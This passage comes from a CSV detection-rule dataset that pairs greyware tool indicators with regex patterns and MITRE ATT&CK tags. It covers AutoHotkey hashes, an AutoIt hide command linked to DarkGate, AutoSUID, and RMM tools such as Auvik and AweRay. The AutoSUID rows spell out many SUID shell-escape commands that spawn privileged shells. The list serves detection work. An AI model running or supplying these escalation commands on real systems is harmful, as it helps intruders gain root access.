TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e0e5f40f9ebdbdbb29d6084e448401335ae802bdfdbe3604abcabbb92baa0d35*",".{0,1000}e0e5f40f9ebdbdbb29d6084e448401335ae802bdfdbe3604abcabbb92baa0d35.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e16e14a5902618298c24b6b6a2503d83d435bd647dcbdc2a20fa5f7285c57168*",".{0,1000}e16e14a5902618298c24b6b6a2503d83d435bd647dcbdc2a20fa5f7285c57168.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e27a87c132686f3e27675a53a2bce7c65328ac148ed2d7e11aefd657224d7d20*",".{0,1000}e27a87c132686f3e27675a53a2bce7c65328ac148ed2d7e11aefd657224d7d20.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e51ba62ce6bfed434f3402945a9aa89f4b312076dfc597b5cae6f25ea0525bc8*",".{0,1000}e51ba62ce6bfed434f3402945a9aa89f4b312076dfc597b5cae6f25ea0525bc8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e85105a9dafcfb10b38227ad4657d329e7ac579a19740e71e1a121919832c2a3*",".{0,1000}e85105a9dafcfb10b38227ad4657d329e7ac579a19740e71e1a121919832c2a3.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*e9f3756f811224b3500981a136dae2ddd79987a510c9f389b67168a7fa494fa8*",".{0,1000}e9f3756f811224b3500981a136dae2ddd79987a510c9f389b67168a7fa494fa8.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*eac0df3ecfc829ba940a7323d21b688896758df43df086ed0e886c68d6003d22*",".{0,1000}eac0df3ecfc829ba940a7323d21b688896758df43df086ed0e886c68d6003d22.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f33996eaa68e8a7a5f5a6156b44af666049769bd021979a6ffb9abb29b45ea2b*",".{0,1000}f33996eaa68e8a7a5f5a6156b44af666049769bd021979a6ffb9abb29b45ea2b.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f5d2887adeaa87f28d30174552b1ec976d302e7c804faa3e8ce74ddb0dda6c78*",".{0,1000}f5d2887adeaa87f28d30174552b1ec976d302e7c804faa3e8ce74ddb0dda6c78.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f815e34b79e1357b7defc86d467077293f56b4cac373394c01a66adabacf3350*",".{0,1000}f815e34b79e1357b7defc86d467077293f56b4cac373394c01a66adabacf3350.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f8b3dcc1c49da62b5302c64901e03eb6f15f0904fdf24e795bd8545e32d31604*",".{0,1000}f8b3dcc1c49da62b5302c64901e03eb6f15f0904fdf24e795bd8545e32d31604.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f8c6eec28f90ec093e1b22cebe727abd2d408015f19944c9f2fea68d79a85673*",".{0,1000}f8c6eec28f90ec093e1b22cebe727abd2d408015f19944c9f2fea68d79a85673.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*f90226225d8c33b99efb6901942b695ca8e75d68a0ccf6000c1f0857b1b39251*",".{0,1000}f90226225d8c33b99efb6901942b695ca8e75d68a0ccf6000c1f0857b1b39251.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/AutoHotkey/AutoHotkey","1","0","#filehash","N/A","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*www.autohotkey.com/download/*",".{0,1000}www\.autohotkey\.com\/download\/.{0,1000}","greyware_tool_keyword","AutoHotkey","AutoHotkey - macro-creation and automation-oriented scripting utility for Windows","T1056.001 - T1027 - T1059.001 - T1140","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/AutoHotkey/AutoHotkey","1","1","N/A","abused by multiple threat actors https://thehackernews.com/2024/06/darkgate-malware-replaces-autoit-with.html - False positives expected","6","10","8948","925","2024-07-06T14:02:52Z","2009-11-25T11:08:21Z" "*start 'AutoIt3.exe' -a '*.a3x';attrib +h*",".{0,1000}start\s\'AutoIt3\.exe\'\s\-a\s\'.{0,1000}\.a3x\'\;attrib\s\+h.{0,1000}","greyware_tool_keyword","AutoIt","starting autoit script and hiding it","T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-05-14-IOCs-for-DarkGate-activity.txt","1","0","N/A","N/A","8","2","161","7","2024-08-29T15:27:38Z","2023-08-29T22:32:38Z" "* pwn_tclsh.me*",".{0,1000}\spwn_tclsh\.me.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* We have found at least * potential SUID exploitable file(s)*",".{0,1000}\sWe\shave\sfound\sat\sleast\s.{0,1000}\spotential\sSUID\sexploitable\sfile\(s\).{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - 
TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./capsh --gid=0 --uid=0 --*",".{0,1000}\.\/capsh\s\-\-gid\=0\s\-\-uid\=0\s\-\-.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./chroot / /bin/sh -p*",".{0,1000}\.\/chroot\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./env /bin/sh -p*",".{0,1000}\.\/env\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./expect -c 'spawn /bin/sh -p;interact'*",".{0,1000}\.\/expect\s\-c\s\'spawn\s\/bin\/sh\s\-p\;interact\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./flock -u / /bin/sh 
-p*",".{0,1000}\.\/flock\s\-u\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./nice /bin/sh -p*",".{0,1000}\.\/nice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*./rview -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\.\/rview\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/ld.so /bin/sh -p*",".{0,1000}\/ld\.so\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/perf stat /bin/sh -p*",".{0,1000}\/perf\sstat\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - 
TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/perl -e 'exec \""/bin/sh\""*",".{0,1000}\/perl\s\-e\s\'exec\s\\\""\/bin\/sh\\\"".{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/pwn_tclsh.me*",".{0,1000}\/pwn_tclsh\.me.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/rvim -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/rvim\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/sshpass /bin/sh -p*",".{0,1000}\/sshpass\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/stdbuf -i0 /bin/sh 
-p*",".{0,1000}\/stdbuf\s\-i0\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/unshare -r /bin/sh*",".{0,1000}\/unshare\s\-r\s\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/view -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/view\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*/watch -x sh -c 'reset* exec sh 1>&0 2>&0*",".{0,1000}\/watch\s\-x\ssh\s\-c\s\'reset.{0,1000}\sexec\ssh\s1\>\&0\s2\>\&0.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*agetty -o -p -l /bin/sh -a root tty*",".{0,1000}agetty\s\-o\s\-p\s\-l\s\/bin\/sh\s\-a\sroot\stty.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a 
way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*cpulimit -l 100 -f -- /bin/sh -p*",".{0,1000}cpulimit\s\-l\s100\s\-f\s\-\-\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*dmsetup create base <> \$TF*",".{0,1000}\'exec\s\/bin\/sh\s\-p\s0\<\&1\'\s\>\>\s\\\$TF.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*find . 
-exec /bin/sh -p \; -quit*",".{0,1000}find\s\.\s\-exec\s\/bin\/sh\s\-p\s\\\;\s\-quit.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null*",".{0,1000}find\s\/\s\-xdev\s\-user\sroot\s\\\(\s\-perm\s\-4000\s\-o\s\-perm\s\-2000\s\-o\s\-perm\s\-6000\s\\\)\s2\>\/dev\/null.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*gdb -nx -ex 'python import os*os.execl(\""/bin/sh\*",".{0,1000}gdb\s\-nx\s\-ex\s\'python\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*genie -c '/bin/sh'*",".{0,1000}genie\s\-c\s\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*gimp -idf --batch-interpreter=python-fu-eval -b 'import os* 
os.execl(*/bin/sh*",".{0,1000}gimp\s\-idf\s\-\-batch\-interpreter\=python\-fu\-eval\s\-b\s\'import\sos.{0,1000}\sos\.execl\(.{0,1000}\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*ionice /bin/sh -p*",".{0,1000}ionice\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*logsave /dev/null /bin/sh -i -p*",".{0,1000}logsave\s\/dev\/null\s\/bin\/sh\s\-i\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*msgfilter -P /bin/sh -p -c '/bin/sh*",".{0,1000}msgfilter\s\-P\s\/bin\/sh\s\-p\s\-c\s\'\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*php -r \""pcntl_exec('/bin/sh'*",".{0,1000}php\s\-r\s\\\""pcntl_exec\(\'\/bin\/sh\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files 
and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*rsync -e 'sh -p -c *sh 0<&2 1>&2*127.0.0.1:/dev/null*",".{0,1000}rsync\s\-e\s\'sh\s\-p\s\-c\s.{0,1000}sh\s0\<\&2\s1\>\&2.{0,1000}127\.0\.0\.1\:\/dev\/null.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*strace -o /dev/null /bin/sh -p*",".{0,1000}strace\s\-o\s\/dev\/null\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*taskset 1 /bin/sh -p*",".{0,1000}taskset\s1\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*vim -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vim\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - 
TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*vimdiff -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vimdiff\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*xargs -a /dev/null sh -p*",".{0,1000}xargs\s\-a\s\/dev\/null\ssh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","366","75","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "*>Auvik Networks Inc.<*",".{0,1000}\>Auvik\sNetworks\sInc\.\<.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*auvik.agent.exe*",".{0,1000}auvik\.agent\.exe.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AuvikService.exe*",".{0,1000}AuvikService\.exe.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*https://*.my.auvik.com/*",".{0,1000}https\:\/\/.{0,1000}\.my\.auvik\.com\/.{0,1000}","greyware_tool_keyword","auvik","cloud-based network management software","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.auvik.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.aweray.net*",".{0,1000}\.aweray\.net.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Aweray_Remote_*.exe*",".{0,1000}\/Aweray_Remote_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Aweray_Remote_*.zip*",".{0,1000}\/Aweray_Remote_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Aweray Remote.lnk*",".{0,1000}\\Aweray\sRemote\.lnk.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Aweray_Remote_*.exe*",".{0,1000}\\Aweray_Remote_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Aweray_Remote_*.zip*",".{0,1000}\\Aweray_Remote_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support 
